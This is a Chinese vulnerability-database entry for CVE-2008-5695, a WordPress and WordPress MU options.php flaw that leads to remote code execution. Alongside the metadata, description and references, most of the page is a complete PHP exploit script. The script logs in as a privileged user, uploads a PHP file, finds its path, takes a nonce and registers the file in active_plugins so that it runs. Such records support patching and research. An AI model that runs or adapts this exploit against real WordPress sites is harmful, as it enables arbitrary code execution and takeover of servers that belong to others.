WordPress 'wp-admin/options.php' 远程代码执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1114491 漏洞类型 输入验证
发布时间 2008-02-05 更新时间 2008-12-31
CVE编号 CVE-2008-5695 CNNVD-ID CNNVD-200812-408
漏洞平台 PHP CVSS评分 8.5
|漏洞来源
https://www.exploit-db.com/exploits/5066
https://www.securityfocus.com/bid/27633
https://cxsecurity.com/issue/WLB-2008120184
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-408
|漏洞详情
WordPress是一种使用PHP语言开发的博客平台。WordPressMU1.3.2之前的版本和WordPress2.3.2及其早期版本的wp-admin/options.php没有适当地验证对更新选项的请求,这会允许具有管理选项和上传文件能力的远程验证用户通过上传一个PHP脚本并添加该脚本的路径名到active_plugins中,以执行任意代码。
|漏洞EXP
<?php
/*
WordPress [MU] blog's options overwrite

Credits : Alexander Concha <alex at buayacorp dot com>
Website : http://www.buayacorp.com/
Advisory: http://www.buayacorp.com/files/wordpress/wordpress-mu-options-overwrite.html

This exploit uses active_plugins option to execute arbitrary PHP
*/
include_once './class-snoopy.php';

// Fix Snoopy
class SnoopyExt extends Snoopy {
	function _prepare_post_body($formvars, $formfiles) {
		if ( is_string($formvars) ) {
			return $formvars;
		}
		return parent::_prepare_post_body($formvars, $formfiles);
	}
}

set_time_limit( 0 );

// Any user with 'manage_options' and 'upload_files' capabilities
$user = 'user';
$pass = '1234';
$blog_url = 'http://localhost.localdomain/mu/';
$remote_file = ''; // relative path to wp-content
$local_file = ''; // the contents of this file, if any, will be uploaded

$snoopy = new SnoopyExt();

$snoopy->maxredirs = 0;
$snoopy->cookies['wordpress_test_cookie'] = 'WP+Cookie+check';
$snoopy->submit("{$blog_url}wp-login.php", array('log' => $user, 'pwd' => $pass));

$snoopy->setcookies(); // Set auth cookies for future requests

if ( empty($remote_file) ) {
	// Upload a new file
	$snoopy->_submit_type = 'image/gif';
	$snoopy->submit("{$blog_url}wp-app.php?action=/attachments", get_contents());

	if ( preg_match('#<id>([^<]+)</id>#i', $snoopy->results, $match) ) {
		$remote_file = basename($match[1]);
	}
}
if ( empty($remote_file) ) die('Exploit failed...');

// Look for real path
$snoopy->fetch("{$blog_url}wp-admin/export.php?download");

if ( preg_match("#<wp:meta_value>(.*$remote_file)</wp:meta_value>#", $snoopy->results, $match) ) {
	$remote_file = preg_replace('#.*?wp-content#', '', $match[1]);
}
if ( empty($remote_file) ) die('Exploit failed...');

// It asumes that file uploads are stored within wp-content 
$remote_file = '../' . ltrim($remote_file, '/');

$snoopy->fetch("{$blog_url}wp-admin/plugins.php");

// Recover previous active plugins
$active_plugins = array();
if ( preg_match_all('#action=deactivate&([^\']+)#', $snoopy->results, $matches) ) {
	foreach ($matches[0] as $plugin) {
		if ( preg_match('#plugin=([^&]+)#', $plugin, $match) )
			$active_plugins[] = urldecode($match[1]);
	}
	print_r($active_plugins);
}
$active_plugins[] = $remote_file;

// Fetch a valid nonce
$snoopy->fetch("{$blog_url}wp-admin/options-general.php");

if ( preg_match('#name=._wpnonce. value=.([a-z\d]{10}).#', $snoopy->results, $match) ) {

	// Finally update active_plugins
	$snoopy->set_submit_normal();
	$snoopy->submit("{$blog_url}wp-admin/options.php",
		array(
			'active_plugins' => $active_plugins,
			'_wpnonce' => $match[1],
			'action' => 'update',
			'page_options' => 'active_plugins',
		));
}

function get_contents() {
	global $local_file;

	return file_exists($local_file) ? file_get_contents($local_file) : '<?php echo "Hello World " . __FILE__; ?>';
}
?>

# milw0rm.com [2008-02-05]
|受影响的产品
WordPress WordPress MU 1.3.1 WordPress WordPress MU 1.3 WordPress WordPress MU 1.2.3 WordPress WordPress MU 1.2.2 WordPress WordPress 2.3.2 WordPress WordPress 2.3.1
|参考资料

来源:BID
名称:27633
链接:http://www.securityfocus.com/bid/27633
来源:MILW0RM
名称:5066
链接:http://www.milw0rm.com/exploits/5066
来源:MISC
链接:http://www.buayacorp.com/files/wordpress/wp-blog-option-overwrite.txt
来源:MISC
链接:http://www.buayacorp.com/files/wordpress/wordpress-mu-options-overwrite.html
来源:SREASON
名称:4798
链接:http://securityreason.com/securityalert/4798
来源:SECUNIA
名称:28789
链接:http://secunia.com/advisories/28789
来源:mu.wordpress.org
链接:http://mu.wordpress.org/forums/topic.php?id=7534&page&replies=1